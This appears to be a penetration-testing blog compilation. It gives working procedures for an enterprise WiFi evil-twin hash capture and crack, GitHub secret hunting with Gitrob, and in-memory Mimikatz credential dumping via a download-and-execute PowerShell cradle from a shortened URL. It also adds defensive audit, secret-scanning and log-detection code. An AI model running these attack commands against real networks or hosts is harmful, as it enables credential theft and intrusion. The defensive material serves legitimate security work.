Cracking WiFi – Enterprise

Using hostapd-wpe, which implements an IEEE 802.1X Authenticator and Authentication Server for impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable.

Installation is relatively simple, but you might encounter some hiccups on Ubuntu/Debian/Kali. To help get you up and running, I’ve created the following guide.

Installation

Load dependencies:
apt-get install libssl-dev libnl-dev

Install and patch hostapd by doing the following:
git clone https://github.com/OpenSecurityResearch/hostapd-wpe
wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz
tar -zxf hostapd-2.2.tar.gz
cd hostapd-2.2
patch -p1 < ../hostapd-wpe/hostapd-wpe.patch

Stage and perform configuration steps:
cd hostapd
make
cd ../../hostapd-wpe/certs
./bootstrap
cd ../../hostapd-2.2/hostapd
vi hostapd-wpe.conf

Change the following:
interface=eth0 to interface=wlan0 (or the interface of your choosing)
change driver=wired to #driver=wired
uncomment all 802.11 options and define the SSID you wish to "man-in-the-middle"

Run the following to eliminate errors on start:
sudo nmcli nm wifi off
sudo rfkill unblock wlan
sudo ifconfig wlan0 10.15.0.1/24 up
sleep 1

Run the application by doing the following:
sudo ./hostapd-wpe hostapd-wpe.conf

As clients connect, you will see something similar to the following in hostapd-wpe.log:
root@shapeshifter:/opt/hostapd-2.2/hostapd# tail -f hostapd-wpe.log
challenge: d1:a3:22:c0:ba:e3:9d:94
response: c3:fb:98:0c:c9:f0:5b:56:1f:a8:dd:ce:3e:be:cc:36:b1:28:29:61:c3:cd:52:1f
jtr NETNTLM: pkelley:$NETNTLM$d1a322c0bae39d94$c3fb980cc9f05b561fa8ddce3ebecc36b1282961c3cd521f
mschapv2: Wed Mar 11 11:19:50 2015
username: pkelley
challenge: 91:f4:22:b5:24:14:15:56
response: 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48
jtr NETNTLM: pkelley:$NETNTLM$91f422b524141556$71e9f0359668b756ecabb57eda5bc4ef6f4921d135390648

Use asleap to crack these passwords with a word list:
format = asleap -C (challenge) -R (response) -W (wordlist)

Example:
asleap -C 91:f4:22:b5:24:14:15:56 -R 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48 -W /opt/SecLists/Passwords/rockyou.txt

Output:
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using wordlist mode with "/opt/SecLists/Passwords/rockyou.txt".
hash bytes: d86c
NT hash: 8c3efc486704d2ee71eebe71af14d86c
password: Password1234
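What makes this work is the client side: a supplicant that does not pin the RADIUS server's certificate will complete the PEAP tunnel with any authenticator that presents a certificate, and then hand its MSCHAPv2 challenge/response to it. The audit below is an added example written for this post (it is not part of hostapd-wpe or the original article): it parses wpa_supplicant-style network blocks and flags EAP networks that lack ca_cert or a server-name match. The configuration content is constructed for the example; the option names are real wpa_supplicant options.

```python
import re

# Constructed sample wpa_supplicant.conf content, not from a real deployment.
# First EAP network pins nothing; second pins the RADIUS CA and server name;
# third is a plain PSK network and is out of scope for the audit.
SAMPLE_CONF = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="example-only"
    phase2="auth=MSCHAPV2"
}

network={
    ssid="CorpWiFi-Pinned"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="example-only"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}

network={
    ssid="HomeNet"
    key_mgmt=WPA-PSK
    psk="example-only"
}
"""

# One network={...} block per match; block bodies contain no nested braces.
BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
# key=value or key="value" lines inside a block (quotes stripped).
KV_RE = re.compile(r'^\s*([A-Za-z0-9_]+)=("?)(.*?)\2\s*$', re.M)

# Any of these ties the server certificate to the real RADIUS server's name,
# so a certificate merely issued by the trusted CA is not enough.
SERVER_NAME_OPTIONS = ("domain_suffix_match", "domain_match",
                       "subject_match", "altsubject_match")


def parse_networks(conf):
    """Return one dict of option -> value per network={...} block."""
    nets = []
    for body in BLOCK_RE.findall(conf):
        nets.append({key: value for key, _quote, value in KV_RE.findall(body)})
    return nets


def audit_eap_networks(nets):
    """Return [(ssid, [issue, ...])] for EAP networks that would accept an
    impersonated authentication server."""
    findings = []
    for net in nets:
        if net.get("key_mgmt") != "WPA-EAP":
            continue
        issues = []
        if not net.get("ca_cert"):
            issues.append("no ca_cert: any server certificate is accepted")
        if not any(net.get(opt) for opt in SERVER_NAME_OPTIONS):
            issues.append("no server name match: any certificate from the CA is accepted")
        if issues:
            findings.append((net.get("ssid", "?"), issues))
    return findings


if __name__ == "__main__":
    for ssid, issues in audit_eap_networks(parse_networks(SAMPLE_CONF)):
        print(ssid)
        for issue in issues:
            print("  -", issue)
```

Only CorpWiFi is reported; CorpWiFi-Pinned would refuse a rogue authenticator's certificate before any inner MSCHAPv2 exchange takes place. The same two properties (a pinned CA and a server-name check) are what to verify in managed Windows or macOS wireless profiles.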

Penetration Testing Platform Quick-load – Kali

When pentesting in groups or managing a small team of assessors, one of the primary challenges is quickly getting everyone on the same page.  This isn’t possible on all levels.  However, it is our hope that this quick GitHub script can at least get your toolkit close to a standard or, in the event of a hardware failure, get you back up and running quickly.

As always, feel free to fork the GitHub repo and improve upon it.

Installation:

  1. Perform a base-build of Kali Linux.
    Downloadable from here: Kali
  2. Navigate to /opt/
  3. Issue the following command: git clone https://github.com/logikphreak/kali-setup.git
  4. Issue this last command: sh core.sh

You will be prompted for a few platform-specific details, but the answer will generally be “Debian”.

Using Gitrob in your Penetration Testing.

GitHub is a remarkable place to collect data on a target, be it for a legitimate security engagement or to test your own security. Gitrob is a Ruby-based tool that can quickly build a local, searchable index of all code released to GitHub by a particular organization. Once installation is complete, usage is trivial.


gitrob -o <org>  (e.g. gitrob -o aol)

Installation (assumes you are building on Kali):

  1. Navigate to /opt/ and issue the following:
    git clone https://github.com/logikphreak/gitrob.git
  2. Issue the following: sudo -u postgres -i
  3. Create your postgres account and database with the following:
    createuser -s gitrob --pwprompt
    createdb -O gitrob gitrob
  4. For Gitrob to work properly, you will need to create an API key in your Github account.  This is quite simple. After assuring you are logged into github, navigate to https://github.com/settings/applications and generate a new key.
    Copy the value as you will need it later.
  5. Issue the command "gem install gitrob" in /opt/gitrob-0.0.5/
  6. Issue gitrob --configure (pasting your API key and the password created during the postgres step).
  7. Finally, issue (gitrob -o orgname) and let it work. A web service will be spawned when it is complete that can be utilized for searching for leaked sensitive information.

Pro Tip:  You can easily print the browser tabs to PDFs and echo the gitrob output into a text file.  This is particularly useful as evidence in your reports.

Hat tip to Michael for the incredible tool.
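The defensive counterpart to the above is scanning your own organisation's repositories before anyone else does. The following is an added example for this post, not code from Gitrob or its author: a small Python scanner that applies filename and content signatures of the kind a secret hunt relies on (private key blocks, AWS access key IDs, hardcoded password assignments, .env and credential files) to an in-memory map of paths to file contents. The files, values and key IDs are constructed for the example and are not real credentials.

```python
import re

# Constructed sample checkout: path -> file content. Every value is fake.
SAMPLE_REPO = {
    "src/app.py": 'DB_URL = os.environ["DB_URL"]\nTIMEOUT = 30\n',
    "config/settings.py": 'password = "s3cretValue"\nDEBUG = False\n',
    "deploy/creds.env": "AWS_ACCESS_KEY_ID=AKIAEXAMPLEEXAMPLE01\n",
    "keys/id_rsa": "-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n",
    "README.md": "Set PASSWORD in your environment before running.\n",
}

# Content signatures, checked line by line.
CONTENT_PATTERNS = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("private_key_block",
     re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")),
    ("hardcoded_password",
     re.compile(r"""(?i)\bpass(?:word|wd)?\s*[=:]\s*['"][^'"]{4,}['"]""")),
]

# Filename signatures: files that should rarely, if ever, be committed.
FILENAME_PATTERNS = [
    ("ssh_private_key", re.compile(r"(?:^|/)id_(?:rsa|dsa|ecdsa|ed25519)$")),
    ("env_file", re.compile(r"(?:^|/)[^/]*\.env$")),
    ("credential_file", re.compile(r"(?i)(?:creds?|secrets?|credentials)\.")),
]


def scan_repo(files):
    """Return (path, rule, location) findings.

    Only the rule and location are recorded, never the matched value, so the
    findings list can go into a report without re-leaking the secret.
    """
    findings = []
    for path, content in files.items():
        for rule, pattern in FILENAME_PATTERNS:
            if pattern.search(path):
                findings.append((path, rule, "filename"))
        for lineno, line in enumerate(content.splitlines(), 1):
            for rule, pattern in CONTENT_PATTERNS:
                if pattern.search(line):
                    findings.append((path, rule, "line %d" % lineno))
    return findings


if __name__ == "__main__":
    for path, rule, where in scan_repo(SAMPLE_REPO):
        print("%-22s %-20s %s" % (path, rule, where))
```

Against the sample, src/app.py (which reads its secret from the environment) and the README (which only mentions the word PASSWORD) are clean; the settings file, the .env file and the committed private key are reported. Filename rules fire even when the content rules do not, which is why a .env file with nothing sensitive in it today is still worth reviewing.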

Post-Exploitation – Collecting credentials and staying off the disk.

In the many penetration tests that I’ve conducted, one of the primary goals is to collect data for use in lateral movement through the network, in a way that does not trigger any alarms or alerts in Antivirus/Endpoint solutions.  This technique runs in memory without actually installing anything to the disk.  This aids in bypassing additional controls, such as Tripwire.

This is where I’ve found PowerSploit, and more particularly “Invoke-Mimikatz”, to be very useful.  As PowerShell is generally permitted in all environments, regardless of Application Whitelisting, using this module is incredibly powerful.

Giving credit where it is due, clymb3r originally created and posted the script that will be used in this short demo.

It is important to note that this is a post-exploitation module.  You will need to have compromised a host that also permitted the elevation of privileges.  However, domain escalation is not necessary.

From within PowerShell inside the compromised host, issue the following command:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://tinyurl.com/l79l56h'); Invoke-Mimikatz -DumpCreds"

You should see similar output in the console.  You can collect and use all of the credentials displayed for connecting to additional hosts in the environment.

[Screenshot: Windows 7]

If you escalated to domain-level credentials, you can also issue the following command to collect credentials remotely from other hosts.  This is particularly useful for maintaining presence or viewing additional data on the network.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://tinyurl.com/l79l56h'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"

This technique will not work in Windows 8/10, as new security provisions have been made.  However, I’ve seen very small deployment counts for those platforms, whereas XP and Windows 7 are still very much alive and well.

[Screenshot: Windows 10]
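The commands above leave a distinctive trace when PowerShell script block logging is enabled: the download-and-execute pattern (IEX plus DownloadString) and the credential dump switch both appear in the logged script text. The following is an added example for this post, not part of PowerSploit or the original article: a Python triage routine run over constructed records in the shape of script block log events (Event ID 4104 text), assumed to have been exported by whatever collector you use. The hostnames, URLs and event text are constructed; the rules key on the behaviour (a download cradle) as well as the tool name, because the name is trivial to change while the cradle is not.

```python
import re

# Constructed sample script block log records (Event ID 4104 style), not
# captured from a real system. Hostnames and URLs are placeholders.
SAMPLE_EVENTS = [
    {"id": 4104, "host": "ws01",
     "text": "Get-ChildItem C:\\Users | Measure-Object"},
    {"id": 4104, "host": "ws01",
     "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/PLACEHOLDER'); "
             "Invoke-Mimikatz -DumpCreds"},
    {"id": 4104, "host": "ws02",
     "text": "iex (nEw-oBjEcT net.webclient).downloadstring('http://203.0.113.5/x'); "
             "Invoke-Mimikatz -DumpCreds -ComputerName @('fs01','dc01')"},
    {"id": 4104, "host": "ws03",
     "text": "Invoke-WebRequest https://example.invalid/file.zip -OutFile C:\\tmp\\f.zip"},
]

# Ordered rules; all are case-insensitive because PowerShell is.
RULES = [
    # Download cradle: evaluate text fetched straight off the network.
    ("download_cradle",
     re.compile(r"(?i)\b(?:iex|invoke-expression)\b.*\bdownload(?:string|data|file)\b")),
    # Known credential-dumping module or its dump switch.
    ("credential_dump", re.compile(r"(?i)invoke-mimikatz|-dumpcreds")),
    # Fan-out to a list of remote hosts, as in the -ComputerName form above.
    ("remote_target_list", re.compile(r"(?i)-computername\s+@\(")),
]


def triage(events):
    """Return [{'host': ..., 'rules': [...]}] for events matching any rule."""
    hits = []
    for event in events:
        if event.get("id") != 4104:
            continue
        matched = [name for name, pattern in RULES if pattern.search(event["text"])]
        if matched:
            hits.append({"host": event["host"], "rules": matched})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], ", ".join(hit["rules"]))
```

The plain Invoke-WebRequest on ws03 is not reported: fetching a file is routine, whereas piping fetched text into IEX is the part worth paging someone for. A host that matches both download_cradle and remote_target_list, as ws02 does, indicates the activity is already spreading beyond the first compromised machine.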